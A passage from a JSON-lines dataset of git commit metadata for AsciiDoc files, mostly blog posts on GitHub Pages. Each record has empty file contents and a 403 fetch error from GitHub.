'_posts\/2017-12-01-Christmas-Gift-Ideas.adoc' to '_posts\/2017-12-01-Christmas-Gift-Ideas-That-Make-a-Difference.adoc'","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2017-12-01-Christmas-Gift-Ideas-That-Make-a-Difference.adoc","new_file":"_posts\/2017-12-01-Christmas-Gift-Ideas-That-Make-a-Difference.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"b9fd1484690cc605bbf354d3633235a04846634d","subject":"y2b create post FREE GAMES \\u0026 APPS - THIS WEEK ONLY","message":"y2b create post FREE GAMES \\u0026 APPS - THIS WEEK ONLY","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2013-07-08-FREE-GAMES-u0026-APPS--THIS-WEEK-ONLY.adoc","new_file":"_posts\/2013-07-08-FREE-GAMES-u0026-APPS--THIS-WEEK-ONLY.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"f1d0a3554bb5870786cbfda20e7d2ca093618eb7","subject":"Update 2017-04-18-Test.adoc","message":"Update 2017-04-18-Test.adoc","repos":"anthonny\/personal-blog,anthonny\/personal-blog,anthonny\/personal-blog,anthonny\/personal-blog","old_file":"_posts\/2017-04-18-Test.adoc","new_file":"_posts\/2017-04-18-Test.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/anthonny\/personal-blog.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"5dff1db4a4caa86405884e8e8278d59e7adce623","subject":"Update 2016-04-07-Is-it-me-What-am-I-doing-wrong.adoc","message":"Update 2016-04-07-Is-it-me-What-am-I-doing-wrong.adoc","repos":"xquery\/xquery.github.io,xquery\/xquery.github.io,xquery\/xquery.github.io,xquery\/xquery.github.io","old_file":"_posts\/2016-04-07-Is-it-me-What-am-I-doing-wrong.adoc","new_file":"_posts\/2016-04-07-Is-it-me-What-am-I-doing-wrong.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/xquery\/xquery.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"e649edf326574db45de390ca48affe7b825b650b","subject":"Adding release notes for release of revapi_jackson revapi_json revapi_yaml","message":"Adding release notes for release of revapi_jackson revapi_json revapi_yaml\n","repos":"revapi\/revapi,revapi\/revapi,revapi\/revapi","old_file":"revapi-site\/src\/site\/modules\/news\/pages\/news\/20210110-releases.adoc","new_file":"revapi-site\/src\/site\/modules\/news\/pages\/news\/20210110-releases.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/revapi\/revapi.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"102f8fce445c97c8559152ed5db35019c1258bfa","subject":"y2b create post Samsung 55D6500 LED 3D TV (Smart TV)","message":"y2b create post Samsung 55D6500 LED 3D TV (Smart TV)","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2011-09-26-Samsung-55D6500-LED-3D-TV-Smart-TV.adoc","new_file":"_posts\/2011-09-26-Samsung-55D6500-LED-3D-TV-Smart-TV.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"9f11d623f512608ec908fde5531b7d5454f13826","subject":"Update 2016-01-15-Using-Hadoop-to-create-image-tiles.adoc","message":"Update 2016-01-15-Using-Hadoop-to-create-image-tiles.adoc","repos":"sumit1sen\/sumit1sen.github.io,sumit1sen\/sumit1sen.github.io,sumit1sen\/sumit1sen.github.io","old_file":"_posts\/2016-01-15-Using-Hadoop-to-create-image-tiles.adoc","new_file":"_posts\/2016-01-15-Using-Hadoop-to-create-image-tiles.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/sumit1sen\/sumit1sen.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"30e2cbbf84056b4f735b28a506a9fc77a492bf06","subject":"Update 2016-11-13-Burp-Sentinel-improvements-outlook.adoc","message":"Update 2016-11-13-Burp-Sentinel-improvements-outlook.adoc","repos":"dobin\/dobin.github.io,dobin\/dobin.github.io,dobin\/dobin.github.io,dobin\/dobin.github.io","old_file":"_posts\/2016-11-13-Burp-Sentinel-improvements-outlook.adoc","new_file":"_posts\/2016-11-13-Burp-Sentinel-improvements-outlook.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/dobin\/dobin.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"6f8e0beb8962c5142bd770f1b2ccf121ab96b640","subject":"Publish 1993-11-17.adoc","message":"Publish 1993-11-17.adoc","repos":"oppemism\/oppemism.github.io,oppemism\/oppemism.github.io,oppemism\/oppemism.github.io,oppemism\/oppemism.github.io","old_file":"1993-11-17.adoc","new_file":"1993-11-17.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/oppemism\/oppemism.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"8788f1f6c2ddd30283e8d025ab502d7b01465d1d","subject":"Publish 2015-01-31.adoc","message":"Publish 2015-01-31.adoc","repos":"lifengchuan2008\/lifengchuan2008.github.io,lifengchuan2008\/lifengchuan2008.github.io,lifengchuan2008\/lifengchuan2008.github.io,lifengchuan2008\/lifengchuan2008.github.io","old_file":"2015-01-31.adoc","new_file":"2015-01-31.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/lifengchuan2008\/lifengchuan2008.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"3da3e562425c3ab5ab82378ac8f114d0244e4a31","subject":"Update 2015-09-09-Android-Top-level-element-is-not-completed-in-AndroidManifestxml.adoc","message":"Update 2015-09-09-Android-Top-level-element-is-not-completed-in-AndroidManifestxml.adoc","repos":"harichen\/harichen.io,harichen\/harichen.io,harichen\/harichen.io","old_file":"_posts\/2015-09-09-Android-Top-level-element-is-not-completed-in-AndroidManifestxml.adoc","new_file":"_posts\/2015-09-09-Android-Top-level-element-is-not-completed-in-AndroidManifestxml.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/harichen\/harichen.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"f53d3eb56c8a1f796a7a64016dfcbb85d8f96a2e","subject":"Add contributing document","message":"Add contributing document\n","repos":"molindo\/spring-social,codeconsole\/spring-social,molindo\/spring-social,spring-projects\/spring-social,Turbots\/spring-social,Turbots\/spring-social,codeconsole\/spring-social,spring-projects\/spring-social","old_file":"CONTRIBUTING.adoc","new_file":"CONTRIBUTING.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/Turbots\/spring-social.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"f4a9b1ad7ca1ea9efdf06b4b8a7d23e1af5c8ca0","subject":"Update 2015-08-23-Walmart.adoc","message":"Update 2015-08-23-Walmart.adoc","repos":"gsera\/gsera.github.io,gsera\/gsera.github.io,gsera\/gsera.github.io","old_file":"_posts\/2015-08-23-Walmart.adoc","new_file":"_posts\/2015-08-23-Walmart.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/gsera\/gsera.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"24d06f739e0e90e4b92d84193f2d561305d08dd2","subject":"Update 2017-06-02-Azure-4.adoc","message":"Update 2017-06-02-Azure-4.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-06-02-Azure-4.adoc","new_file":"_posts\/2017-06-02-Azure-4.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"67dc37f91f55c8c7755e5d29a54fa884c4a2a4fc","subject":"Update 2017-07-04-Azure-5.adoc","message":"Update 2017-07-04-Azure-5.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-07-04-Azure-5.adoc","new_file":"_posts\/2017-07-04-Azure-5.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"6dd521d3e06233b1080ac64cf35e6397ac9f9585","subject":"Update 2017-11-23-Azure-8.adoc","message":"Update 2017-11-23-Azure-8.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-11-23-Azure-8.adoc","new_file":"_posts\/2017-11-23-Azure-8.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"35cbfcda028fc0e7132f063b507707e600af9d06","subject":"Update 2019-01-19-Vuejs-4.adoc","message":"Update 2019-01-19-Vuejs-4.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2019-01-19-Vuejs-4.adoc","new_file":"_posts\/2019-01-19-Vuejs-4.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"95977b1f188e701b69d81abb5e97f9faa7f5d0f7","subject":"Update 2015-10-23-A-2nd-example-post.adoc","message":"Update 2015-10-23-A-2nd-example-post.adoc","repos":"IdeaThoughtStream\/IdeaThoughtStream.github.io.old2,IdeaThoughtStream\/IdeaThoughtStream.github.io.old2,IdeaThoughtStream\/IdeaThoughtStream.github.io.old2","old_file":"_posts\/2015-10-23-A-2nd-example-post.adoc","new_file":"_posts\/2015-10-23-A-2nd-example-post.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/IdeaThoughtStream\/IdeaThoughtStream.github.io.old2.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"b8e2402c9f045f092a8b7e9c2af69b295f53c58a","subject":"y2b create post What Magic Is This?","message":"y2b create post What Magic Is This?","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2017-01-07-What-Magic-Is-This.adoc","new_file":"_posts\/2017-01-07-What-Magic-Is-This.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"26e0c907f5cc4d1be889f64577ce5468d8f7ea84","subject":"Update 2018-10-15-N-E-M-A-P-I-Docker.adoc","message":"Update 2018-10-15-N-E-M-A-P-I-Docker.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2018-10-15-N-E-M-A-P-I-Docker.adoc","new_file":"_posts\/2018-10-15-N-E-M-A-P-I-Docker.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"6c8bb741865f7b0055d96a6542f74819bae28dec","subject":"Update 2019-09-10-Model-Distillation.adoc","message":"Update 2019-09-10-Model-Distillation.adoc","repos":"anshu92\/blog,anshu92\/blog,anshu92\/blog,anshu92\/blog","old_file":"_posts\/2019-09-10-Model-Distillation.adoc","new_file":"_posts\/2019-09-10-Model-Distillation.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/anshu92\/blog.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"7ef159cadc91c9cfff990cc4024ec71908f612ec","subject":"Update 2018-05-02-create-Google-Document-From-Spreadsheet.adoc","message":"Update 2018-05-02-create-Google-Document-From-Spreadsheet.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2018-05-02-create-Google-Document-From-Spreadsheet.adoc","new_file":"_posts\/2018-05-02-create-Google-Document-From-Spreadsheet.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"9fc0bec056370ec560ed6cfddf86e25ee4a8d6a5","subject":"Update 2016-03-26-Microservices-in-the-Chronicle-World-Part-3.adoc","message":"Update 2016-03-26-Microservices-in-the-Chronicle-World-Part-3.adoc","repos":"Vanilla-Java\/vanilla-java.github.io,Vanilla-Java\/vanilla-java.github.io,Vanilla-Java\/vanilla-java.github.io,Vanilla-Java\/vanilla-java.github.io","old_file":"_posts\/2016-03-26-Microservices-in-the-Chronicle-World-Part-3.adoc","new_file":"_posts\/2016-03-26-Microservices-in-the-Chronicle-World-Part-3.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/Vanilla-Java\/vanilla-java.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"c8616db6af9877657f2e2509546258af2d2b3336","subject":"update tag filtering examples and fix errors in tag update\/delete examples","message":"update tag filtering examples and fix errors in tag update\/delete examples\n","repos":"jsanda\/hawkular.github.io,jsanda\/hawkular.github.io,jsanda\/hawkular.github.io,jsanda\/hawkular.github.io","old_file":"src\/main\/jbake\/content\/docs\/components\/metrics\/index.adoc","new_file":"src\/main\/jbake\/content\/docs\/components\/metrics\/index.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/jsanda\/hawkular.github.io.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"e8b36d95721b4f6369ad1226d629ae9bce2aafd1","subject":"Create README.adoc","message":"Create README.adoc","repos":"fmarchioni\/mastertheboss,fmarchioni\/mastertheboss,fmarchioni\/mastertheboss,fmarchioni\/mastertheboss,fmarchioni\/mastertheboss","old_file":"maven-archetype\/README.adoc","new_file":"maven-archetype\/README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/fmarchioni\/mastertheboss.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"b8b158e1fc9274226a2d2ff590474f5bc84a834a","subject":"Update 2016-10-07-draft-how-to-configure-deamon-docker-on-osx.adoc","message":"Update 2016-10-07-draft-how-to-configure-deamon-docker-on-osx.adoc","repos":"PierreBtz\/pierrebtz.github.io,PierreBtz\/pierrebtz.github.io,PierreBtz\/pierrebtz.github.io,PierreBtz\/pierrebtz.github.io","old_file":"_posts\/2016-10-07-draft-how-to-configure-deamon-docker-on-osx.adoc","new_file":"_posts\/2016-10-07-draft-how-to-configure-deamon-docker-on-osx.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/PierreBtz\/pierrebtz.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"7f9ad1a32b203fd8d895395a65ca1412aa0c91fa","subject":"Create test.adoc","message":"Create test.adoc","repos":"drom\/wavedrom,drom\/wavedrom,drom\/wavedrom","old_file":"test\/test.adoc","new_file":"test\/test.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/drom\/wavedrom.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"830c2085d2d0f9daf0d7baa472683c7561ac6e34","subject":"Update 2015-09-21-How-to-Think-Like-a-Computer-Scientist.adoc","message":"Update 2015-09-21-How-to-Think-Like-a-Computer-Scientist.adoc","repos":"milantracy\/milantracy.github.io,milantracy\/milantracy.github.io,milantracy\/milantracy.github.io","old_file":"_posts\/2015-09-21-How-to-Think-Like-a-Computer-Scientist.adoc","new_file":"_posts\/2015-09-21-How-to-Think-Like-a-Computer-Scientist.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/milantracy\/milantracy.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"a72fdb7eb4804bcc1f0540163454d7d75e0f15a7","subject":"Update 2016-11-27-Apimans-New-Execute-Blocking-Component.adoc","message":"Update 2016-11-27-Apimans-New-Execute-Blocking-Component.adoc","repos":"msavy\/rhymewithgravy.com,msavy\/rhymewithgravy.com,msavy\/rhymewithgravy.com,msavy\/rhymewithgravy.com","old_file":"_posts\/2016-11-27-Apimans-New-Execute-Blocking-Component.adoc","new_file":"_posts\/2016-11-27-Apimans-New-Execute-Blocking-Component.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/msavy\/rhymewithgravy.com.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"fb1ff03ec0821c345711d51d3982cef9c6549f26","subject":"Create BuildingInWindows.adoc","message":"Create BuildingInWindows.adoc","repos":"igagis\/morda,igagis\/morda,igagis\/morda","old_file":"wiki\/BuildingInWindows.adoc","new_file":"wiki\/BuildingInWindows.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/igagis\/morda.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"f42e7e186fdaf9612b7c43222151b99bc51f237b","subject":"Moved the Forge instructions from readme.asciidoc to readme-forge.asciidoc","message":"Moved the Forge instructions from readme.asciidoc to readme-forge.asciidoc\n","repos":"devoxx4kids\/materials,ooms\/materials,ooms\/materials,devoxx4kids\/materials,ooms\/materials,devoxx4kids\/materials,ooms\/materials,devoxx4kids\/materials,devoxx4kids\/materials,ooms\/materials,devoxx4kids\/materials,ooms\/materials,ooms\/materials,devoxx4kids\/materials","old_file":"workshops\/minecraft\/readme-forge.asciidoc","new_file":"workshops\/minecraft\/readme-forge.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/ooms\/materials.git\/': The requested URL returned error: 403\n","license":"lgpl-2.1","lang":"AsciiDoc"} {"commit":"bae4864e5eadd4afcd320c5ae0abed3997c1e023","subject":"Add RELEASE.adoc to describe the release process","message":"Add RELEASE.adoc to describe the release process\n","repos":"jotak\/hawkular-grafana-datasource,hawkular\/hawkular-grafana-datasource,hawkular\/hawkular-grafana-datasource,jotak\/hawkular-grafana-datasource,hawkular\/hawkular-grafana-datasource,jotak\/hawkular-grafana-datasource","old_file":"RELEASE.adoc","new_file":"RELEASE.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/hawkular\/hawkular-grafana-datasource.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"738b6ddab3f648a0c6d8c6ff972d057396c6f79a","subject":"1.3.0 release blog","message":"1.3.0 release blog\n","repos":"msavy\/apiman.github.io,apiman\/apiman.github.io,apiman\/apiman.github.io,msavy\/apiman.github.io,msavy\/apiman.github.io,msavy\/apiman.github.io,apiman\/apiman.github.io,apiman\/apiman.github.io","old_file":"_blog-src\/_posts\/2017-05-10-release-1.3.adoc","new_file":"_blog-src\/_posts\/2017-05-10-release-1.3.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/msavy\/apiman.github.io.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"955da56fe3e35c886c2675f5b44ec80c1f305b0c","subject":"Update 2016-04-13-Administracion-Remota.adoc","message":"Update 2016-04-13-Administracion-Remota.adoc","repos":"camilo28\/camilo28.github.io,camilo28\/camilo28.github.io,camilo28\/camilo28.github.io,camilo28\/camilo28.github.io","old_file":"_posts\/2016-04-13-Administracion-Remota.adoc","new_file":"_posts\/2016-04-13-Administracion-Remota.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/camilo28\/camilo28.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"93a822a6d65e48414591034654d12c453499240f","subject":"Trim introductory material.","message":"Trim introductory material.\n","repos":"joyent\/rfd,davepacheco\/rfd,joyent\/rfd,davepacheco\/rfd,davepacheco\/rfd,melloc\/rfd,joyent\/rfd,joyent\/rfd,davepacheco\/rfd,melloc\/rfd,davepacheco\/rfd,melloc\/rfd","old_file":"rfd\/0106\/README.adoc","new_file":"rfd\/0106\/README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/joyent\/rfd.git\/': The requested URL returned error: 403\n","license":"mpl-2.0","lang":"AsciiDoc"} {"commit":"a67ffc62d5ac1b87d96a16238676e26765512c73","subject":"y2b create post Turn Your Phone Into A Breathalyzer!","message":"y2b create post Turn Your Phone Into A Breathalyzer!","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2016-07-06-Turn-Your-Phone-Into-A-Breathalyzer.adoc","new_file":"_posts\/2016-07-06-Turn-Your-Phone-Into-A-Breathalyzer.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"70a8ce25bae58a35c9ea4609ff6f1aa2149c42dc","subject":"CL note: suppress banner","message":"CL note: suppress banner\n","repos":"cmpitg\/programming-language-notes","old_file":"Common-Lisp.adoc","new_file":"Common-Lisp.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/cmpitg\/programming-language-notes.git\/': The requested URL returned error: 403\n","license":"bsd-2-clause","lang":"AsciiDoc"} {"commit":"48e906bb66a9ce5b857cc2df3236c900a84ba022","subject":"Update 2015-05-16-genial.adoc","message":"Update 2015-05-16-genial.adoc","repos":"faustinoloeza\/blog,faustinoloeza\/blog,faustinoloeza\/blog","old_file":"_posts\/2015-05-16-genial.adoc","new_file":"_posts\/2015-05-16-genial.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/faustinoloeza\/blog.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"377c399331672bc60d0e21d5301170402e5f14b4","subject":"Update Estrategias-inteligentes-Estrategias-inteligentes-S-E-T-A.adoc","message":"Update Estrategias-inteligentes-Estrategias-inteligentes-S-E-T-A.adoc","repos":"camilo28\/camilo28.github.io,camilo28\/camilo28.github.io,camilo28\/camilo28.github.io,camilo28\/camilo28.github.io","old_file":"_posts\/Estrategias-inteligentes-Estrategias-inteligentes-S-E-T-A.adoc","new_file":"_posts\/Estrategias-inteligentes-Estrategias-inteligentes-S-E-T-A.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/camilo28\/camilo28.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"cd65e6bc1f8f63d65a403dfcb2d86be03c983222","subject":"Update 2017-10-20-Mac-Tableau-Desktop-Treasure-Data.adoc","message":"Update 2017-10-20-Mac-Tableau-Desktop-Treasure-Data.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-10-20-Mac-Tableau-Desktop-Treasure-Data.adoc","new_file":"_posts\/2017-10-20-Mac-Tableau-Desktop-Treasure-Data.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"9bdf26e5bdd93afeb80c93c58f593b5d7be05d3d","subject":"Update 2016-07-15-Chairpersons-Chinwag-July-Edition.adoc","message":"Update 2016-07-15-Chairpersons-Chinwag-July-Edition.adoc","repos":"Perthmastersswimming\/hubpress.io,Perthmastersswimming\/hubpress.io,Perthmastersswimming\/hubpress.io,Perthmastersswimming\/hubpress.io","old_file":"_posts\/2016-07-15-Chairpersons-Chinwag-July-Edition.adoc","new_file":"_posts\/2016-07-15-Chairpersons-Chinwag-July-Edition.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/Perthmastersswimming\/hubpress.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"cff9c773dc3d9e34ba77606ea196d9dec774df09","subject":"Update 2019-01-31-Convert-snake-case-to-camel-Case-in-Vim.adoc","message":"Update 2019-01-31-Convert-snake-case-to-camel-Case-in-Vim.adoc","repos":"Ugotsta\/Ugotsta.github.io,Ugotsta\/Ugotsta.github.io,Ugotsta\/Ugotsta.github.io,Ugotsta\/Ugotsta.github.io","old_file":"_posts\/2019-01-31-Convert-snake-case-to-camel-Case-in-Vim.adoc","new_file":"_posts\/2019-01-31-Convert-snake-case-to-camel-Case-in-Vim.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/Ugotsta\/Ugotsta.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"c755033feed08313a8ff8864b9fac303a93bdb16","subject":"update TESTING doc to use run.sh script","message":"update TESTING doc to use run.sh script\n","repos":"jeteve\/elasticsearch,wenpos\/elasticsearch,pablocastro\/elasticsearch,Collaborne\/elasticsearch,SaiprasadKrishnamurthy\/elasticsearch,rmuir\/elasticsearch,ZTE-PaaS\/elasticsearch,andrestc\/elasticsearch,Kakakakakku\/elasticsearch,mrorii\/elasticsearch,Siddartha07\/elasticsearch,nomoa\/elasticsearch,uschindler\/elasticsearch,baishuo\/elasticsearch_v2.1.0-baishuo,caengcjd\/elasticsearch,ivansun1010\/elasticsearch,smflorentino\/elasticsearch,SaiprasadKrishnamurthy\/elasticsearch,mcku\/elasticsearch,szroland\/elasticsearch,lightslife\/elasticsearch,strapdata\/elassandra5-rc,yongminxia\/elasticsearch,EasonYi\/elasticsearch,dylan8902\/elasticsearch,jchampion\/elasticsearch,scottsom\/elasticsearch,fforbeck\/elasticsearch,masterweb121\/elasticsearch,mute\/elasticsearch,Rygbee\/elasticsearch,mapr\/elasticsearch,polyfractal\/elasticsearch,SergVro\/elasticsearch,sarwarbhuiyan\/elasticsearch,18098924759\/elasticsearch,ydsakyclguozi\/elasticsearch,beiske\/elasticsearch,mmaracic\/elasticsearch,i-am-Nathan\/elasticsearch,LewayneNaidoo\/elasticsearch,kevinkluge\/elasticsearch,linglaiyao1314\/elasticsearch,kevinkluge\/elasticsearch,Charlesdong\/elasticsearch,jimczi\/elasticsearch,fred84\/elasticsearch,dongjoon-hyun\/elasticsearch,tsohil\/elasticsearch,ricardocerq\/elasticsearch,kunallimaye\/elasticsearch,HarishAtGitHub\/elasticsearch,huanzhong\/elasticsearch,kimimj\/elasticsearch,brandonkearby\/elasticsearch,pranavraman\/elasticsearch,nazarewk\/elasticsearch,iantruslove\/elasticsearch,nazarewk\/elasticsearch,liweinan0423\/elasticsearch,sdauletau\/elasticsearch,markharwood\/elasticsearch,ydsakyclguozi\/elasticsearch,diendt\/elasticsearch,beiske\/elasticsearch,episerver\/elasticsearch,nellicus\/elasticsearch,clintongormley\/elasticsearch,Liziyao\/elasticsearch,andrejserafim\/elasticsearch,mohit\/elasticsearch,schonfeld\/elasticsearch,tebriel\/elasticsearch,dataduke\/elasticsearch,HonzaKral\/elasticsearch,nellicus\/elasticsearch,gingerwizard\/elasticsearch,mohit\/elasticsearch,rajanm\/elasticsearch,iacdingping\/elasticsearch,iantruslove\/elasticsearch,szroland\/elasticsearch,humandb\/elasticsearch,djschny\/elasticsearch,hafkensite\/elasticsearch,caengcjd\/elasticsearch,huanzhong\/elasticsearch,kcompher\/elasticsearch,fred84\/e